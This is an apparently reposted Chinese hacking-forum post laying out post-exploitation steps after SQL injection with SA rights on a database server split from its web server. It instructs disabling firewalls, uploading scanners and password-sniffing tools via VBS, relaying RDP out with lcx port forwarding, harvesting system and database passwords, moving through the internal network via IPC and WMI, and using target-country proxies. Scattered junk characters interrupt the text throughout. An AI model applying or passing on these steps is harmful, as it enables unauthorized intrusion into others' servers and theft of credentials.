当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
, s' N, I4 ]' Y; b0 p2 q0 N8 @+ U. Z$ R9 T/ O% P
2 W F3 `' x, X% L7 V9 k* C
5 {. B( B- U# A# k. z% [% _# f
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
~8 `3 M2 c. [9 _$ h
1 s$ m1 c0 O% s! K' _8 S7 K- {/ G' A! e4 ?! J, k, U
一、DB机有公网IP./ \$ Z: ~) d# L% g
" J$ B Y2 a' r: Y; p* d
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.1 R8 n+ F) O1 N( D# O+ d
3 H! N( `5 j0 m( {% w
6 |% V' e! K* }$ b S
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
% e" u6 V% k( x0 v' w# d. Z5 V2 y6 Y6 @8 y/ R4 {
( r/ ?- [/ G0 \) U* v3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
+ L( m. J, _0 s* u1 o- E1 \& V- X1 L5 Y3 p z; j. e/ j/ q
3 {4 x8 s: _& E4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
4 a! ~6 ~6 a* _& s' X$ W4 B: ?3 H/ t$ k* C6 R5 z. D
. t' L# u, K( ~$ G9 E, L
, E% e- j" g3 Y二、DB机只有内网IP
' [& W* i3 d; b' d+ d, G& }1 |5 n8 Q ?
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等. Q% `; d6 l( [5 M L, b& O
* i3 r m3 J2 R- [0 G0 n# n! j
1 Z! T" H) R) \, o2:停掉防火墙和IP策略再从内往外扫描.
/ {8 q4 y1 H5 U2 z7 C& {/ G E
) ~! n1 y5 t' d2 s i" R. u& \0 M
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.& s0 ^4 {) w! a. Z$ [; D1 c9 Z
' _- l+ p1 a! z7 [/ i* Y! G* N
* F9 H/ t5 q+ w
4:学会密码规律分析往往会有惊喜.
2 T! Z- [# J4 m2 T1 D" [: Q! L% C5 c
+ `+ m& U' y/ t- v8 `" |) v. S
$ j& F) R! v5 `9 _. G( [; X5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等. x- P$ c5 c, |4 I- q2 N6 H6 ^
9 h, F4 u- ]3 r& h
& [8 i6 g( l. s' T有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对